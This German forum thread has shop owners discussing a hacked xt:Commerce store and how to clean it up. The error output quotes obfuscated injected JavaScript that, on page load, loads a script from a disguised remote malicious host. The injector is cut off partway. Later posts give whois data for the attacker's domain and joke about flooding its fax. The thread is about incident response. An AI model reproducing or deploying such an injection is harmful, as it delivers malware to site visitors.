Shop gehackt ?! .... benötige dringend Unterstützung

[BalmyBeads]

Hallo zusammen,

ich hoffe Ihr habt Weihnachten ruhig und gesund hinter Euch gebracht und könnt mir bei meinem Problem helfen.
Anscheinend wurde mein Shop die Nacht gehackt! Ich kann auf meine HP zwar zugreifen, aber sobald ich den Shop aufrufe sehe ich nur das :

PHP-Code:

Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!&#p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t&#)p#!!:)^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&:)@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e&##!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(c&#o!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w00xxxxxx/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095
Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!&#p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t&#)p#!!:)^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&:)@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e&##!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(c&#o!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w008d0f6/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095 


Da ich mit so etwas noch nie Probleme hatte, stehe ich wie der Ochse vorm Berg. Wie geht man am besten vor? Kann ich diese Eintragungen einfach löschen? Muss ich dabei irgendetwas beachten?
Fragen über Fragen .... und dabei habe ich gerade eine fette Rabatt-Aktion laufen und komme an die Daten natürlich nicht ran.

Bitte, bitte, ich brauche wirklich dringend Unterstützung.
Schon einmal lieben Dank
BalmyBeads

[Fry]

Ich behaupte mal, dein Shop wurde gehackt

Heisst erstmal alles verschrotten, Logfiles sichern, Server neu aufsetzen und die Lücken stopfen, ein absolut sauberes Backup einspielen und gut.
Bei Webspace ein nachweislich sauberes Backup einspielen und evtl. den Provider bescheidgeben, jenachdem ob du weisst durch welches Tor der reingekommen ist. Dein Tor: eigenes Pech!

Und vor allem mal deine eigenen Rechner nach Viren durchsuchen, nach Möglichkeit aber nicht mit kostenlosen Zeugs wie Avira und Co. (was selber ein grosses Tor ist ) sondern eine Antivirensoft, die man durchaus bezahlen muss.

[huzzl]

Hallo Balmy,

ja, Dein Shop wurde gehackt. Unser Shop (3.04 SP 2.1) gestern vormittag auch.

Was wir sofort änderten: FTP-Zugang und DB-Zugang (Passwörter)

Wir haben daraufhin das Backup (ich dachte, wir bräuchten das nie...) zurückgespielt, und er war wieder desinfiziert.

Manuell den Shop zu reinigen braucht sehr viel Zeit (Du kannst via FTP alles runterkopieren und unter Cygwin (oder bash) mit

Code:

fgrep -l -R * X38cqqcd2l81

suchen (ist bei jedem infizierten Rechner eine andere Variable)

Wir spielten nachher noch die Patches von XT Commerce security leaks – and their fixes | professional website design ein und sind seitdem wieder up&running...

lg, huzzl

[huzzl]

Zitat:

Zitat von huzzl

Unser Shop (3.04 SP 2.1) gestern vormittag auch.

Das so eingebundene Script verwies auf die Domäne thegiftsale.ru

domain: THEGIFTSALE.RU
type: CORPORATE
nserver: ns1.hostserverdirect.com.
nserver: ns2.hostserverdirect.com.
nserver: ns3.hostserverdirect.com.
nserver: ns4.hostserverdirect.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8552 585772
fax-no: +7 8552 585772
e-mail: dull@freemailbox.ru
registrar: NAUNET-REG-RIPN
created: 2009.11.22

Hab' probiert anzurufen - es geht nur das FAX ran. Vielleicht sollte ich eine schwarze Papierrolle in unserem Fax einspannen und auf "senden" drücken...

[Fry]

Zitat:

Zitat von huzzl

Wir spielten nachher noch die Patches von XT Commerce security leaks – and their fixes | professional website design ein und sind seitdem wieder up&running...

Und zwar höchstens so lange, bis der Idiot wiederkommt und exakt die selbe Lücke in deinem OS wieder findet

Nicht xtC muss gepacht werden, sondern das, was zwischen euch und xtC hängt: Standalone und Server!

Zitat:

Vielleicht sollte ich eine schwarze Papierrolle in unserem Fax einspannen und auf "senden" drücken...

Haaaa, ist das mal ne geile Idee

[huzzl]

Zitat:

Zitat von Fry

Und zwar höchstens so lange, bis der Idiot wiederkommt und exakt die selbe Lücke in deinem OS wieder findet

Nicht xtC muss gepacht werden, sondern das, was zwischen euch und xtC hängt: Standalone und Server!

Danke für den Tipp! Ich wunderte mich, wie dieser *$%&/ auf das FTP-Passwort kam -> das Update für die Linux-Kiste rennt schon...